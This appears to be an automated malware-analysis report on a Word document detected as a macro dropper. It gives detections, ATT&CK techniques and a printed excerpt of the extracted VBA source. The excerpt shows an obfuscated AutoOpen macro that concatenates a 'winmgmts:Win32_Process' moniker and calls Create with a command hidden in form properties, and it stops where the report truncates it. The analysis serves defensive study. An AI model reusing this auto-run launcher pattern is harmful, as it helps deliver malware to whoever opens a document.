MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The macro utilizes GetObject and CreateObject to launch a WMI process, indicating an attempt to execute arbitrary commands or download further payloads. The ClamAV detection 'Doc.Dropper.Agent-6965774-0' further supports its malicious nature as a dropper.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6965774-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6965774-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6850 bytes |
SHA-256: cb10093ac6f0739d22565c71f619174ba982a01e43294f7cf8cd03d45a4c336f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "u266359_"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "o527_216"
Attribute VB_Base = "0{E89BDF6C-CDF9-44B3-BD78-6D56238EDB36}{FC61C88D-9A4A-4EF7-8F47-76F8210231CE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "v82049"
Attribute VB_Name = "d8260569"
Attribute VB_Name = "X_03_27"
Attribute VB_Name = "A4590489"
Attribute VB_Name = "S9473908"
Attribute VB_Base = "0{63AF6905-F3A3-438D-AF8E-870DC54746BD}{AA920780-647F-4A27-A65D-137B92DB7800}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "N25165"
Function E723134(K1071967)
While U12808__ And O20757
'f527_070o731565M1112848z9380149
'P11_52O853203_C07282d_4_2972
'w28_76O87450k_6250i2647881
Wend
While k043491 And z14204
'G76403M74__42S097236U0103233
'd298481Z27_9665A4_1193T38887_
'M6_1299w3588388E902288V_401_26
Wend
Set E723134 = CVar(K1071967)
While U34068 And I7_31652
'm513901A8_211_z178083n2__6779
'J55973M60314X9164_Q95135
's_1363L6_4_71S29888W699810
Wend
While Z9656_95 And i69512
'a0571812P656120X62755K4801345
'v895542o25762_R3_36_w9342198
'V12965j9839241X83067s1818_
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While z4527138 And S13571
'V870228r6622618V994915A476963
'C23674H03739z885009z54_87
'q7_4_250a0196219E435258M53585
Wend
While k9161891 And q7865_
'u463631l__8477r3378_82p6745235
'R952312a_2062O77742A27671
'L71925C0708823z980183_b2959070
Wend
Call k566251
While U8_273 And s992217
'L84922_1X600_0O5662_m020_59
's3537124C1_93114l649741L190227
'l55322_6u90177w783_30O3977347
Wend
While S775548 And P57178_2
'h4828_08w4116549W0830964Q377348
'Y68259_4J531659L_57__6Y0299073
'M605_872E35843w82__3W5745371
Wend
While u19558 And Y3880_46
'z104656Z447930s3763760z_993002
'b508477u511677t307189Y2802744
'w281435w4381441Q30_011_X832405
Wend
End Sub
Attribute VB_Name = "U830644"
Function k566251()
On Error Resume Next
While L385225 And Q5076977
'q5661119j516643i64_61k13732
'F8884148t45126O366160n60543
'h7_0728I00809s8577306J007207
Wend
While j987061 And O391_773
'I4979_z734759L6_62062E360102
't2_761V_74339U8_63696V93566
'j4065152F01964w788222f3620742
Wend
While J965_593 And Y_823_8
'b39991V25203T22561W46_3_7
'Q185_85T27678s0718682Y906668
'z95581Y2_80931U77_473X071915
Wend
E166256 = o527_216.c232_28.ControlTipText + S9473908.A9_04_3 + o527_216.c232_28.ControlSource + S9473908.o454584 + o527_216.c232_28.PasswordChar + o527_216.c232_28.PasswordChar + S9473908.C_17318_ + o527_216.c232_28.ControlTipText + o527_216.c232_28 + S9473908.G_838386 + o527_216.c232_28 + S9473908.N674__ + o527_216.c232_28.ControlSource
While u__197 And f37805
'n2121_f96_706h1316_38Q6532487
'E3_346_b9900351J06835d47_46
'V1181120d8719354j789335d53719
Wend
While G60_5_ And J37048
't3170600C98773_3M055_425h463_09
'i8_76_d84_141u88745N9358950
'H330660z77_670_l445832t00128
Wend
Set j589625 = E723134(GetObject("win" + "mg" _
+ "mts:W" _
+ "in32_Pro" + "cess"))
While X65_58 And I3_2702
'z_4839O1018475C615955T867438
'Y5396128Z_58832b30403p569_4
'Z54__419f1_943_7j257_043a889309
Wend
While p13_2469 And M167920
'q77976l9426988c2411_4q727336
'N48557K69390R6_9675w17210
'V62928z905319v9609804d202701
Wend
j589625.Create v39456 + E166256 + z904_32, V794583,
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.